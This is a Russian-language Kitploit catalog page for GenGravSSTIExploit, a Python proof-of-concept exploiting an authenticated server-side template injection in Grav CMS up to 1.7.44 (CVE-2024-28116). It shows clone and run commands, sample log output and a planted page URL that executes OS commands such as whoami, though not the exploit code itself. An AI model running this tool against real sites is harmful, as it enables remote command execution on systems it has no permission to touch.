Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
GenGravSSTIExploit — это PoC-скрипт на Python, который эксплуатирует аутентифицированную уязвимость внедрения шаблонов на стороне сервера (SSTI) в Grav CMS версиях <= 1.7.44 (CVE-2024-28116) | Kitploit
Инструменты/GitHubGitHub/geniuszly/gengravsstiexploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и Образование
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

это PoC-скрипт на Python, который эксплуатирует аутентифицированную уязвимость внедрения шаблонов на стороне сервера (SSTI) в Grav CMS версиях <= 1.7.44 (CVE-2024-28116)

Репозиторий
721 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GenGravSSTIExploit — это PoC-скрипт на Python, эксплуатирующий аутентифицированную уязвимость Server-Side Template Injection (SSTI) в Grav CMS версий <= 1.7.44 (CVE-2024-28116). Эта уязвимость позволяет пользователю с правами редактора выполнять команды ОС на удаленном сервере.

Примечание: Для работы скрипта требуются действительные учетные данные для аутентификации в консоли Grav CMS.

Возможности

  • Аутентификация в панели администратора Grav CMS с использованием учетных данных редактора.
  • Создание новой страницы в CMS для внедрения полезной нагрузки.
  • Удаленное выполнение команд ОС с использованием уязвимости SSTI.

Требования

  • Python 3.x
  • Библиотека requests (установить с помощью pip install requests)

Использование

  1. Клонируйте репозиторий

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. Настройте учетные данные

    Отредактируйте скрипт, указав учетные данные редактора Grav CMS:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. Запустите скрипт

    Используйте следующую команду для запуска скрипта:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: Целевой URL в формате http[s]://hostname.
    • <PORT>: Номер порта (по умолчанию 80).

    Пример:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. Взаимодействие с эксплойтом

    При успешном выполнении эксплойта вы получите URL, по которому можно выполнять команды ОС:

    root@kitploit:~
    [+] RCE payload injected. Visit the malicious page: http://example.com:8080/poc_<ID>?do=<command>
    

Пример вывода

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

Скрипт будет выполнять каждый шаг, предоставляя обновления в терминале. Вы увидите примерно следующее:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Проверка целевого URL...
2024-10-02 12:00:02 - INFO - Получение session cookie и login-nonce...
2024-10-02 12:00:03 - INFO - Попытка аутентификации в Grav CMS...
2024-10-02 12:00:04 - INFO - Доступ к админ-панели после аутентификации...
2024-10-02 12:00:05 - INFO - Создание новой страницы...
2024-10-02 12:00:06 - INFO - Получение form-nonce и unique_form_id...
2024-10-02 12:00:07 - INFO - Инъекция RCE-полезной нагрузки...
2024-10-02 12:00:08 - INFO - [+] Инъекция RCE успешна. Перейдите по ссылке: http://example.com:8080/poc_4T7B?do=<command>

После завершения скрипта вы увидите сообщение со ссылкой на внедренную страницу. Перейдите по этой ссылке для выполнения команд ОС:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

При посещении URL с указанной командой вывод отобразится непосредственно на странице:

root@kitploit:~
Cmd-Output:
root

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей. Используйте его ответственно и только на системах, где у вас есть явное разрешение. Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим скриптом.

Скачать инструмент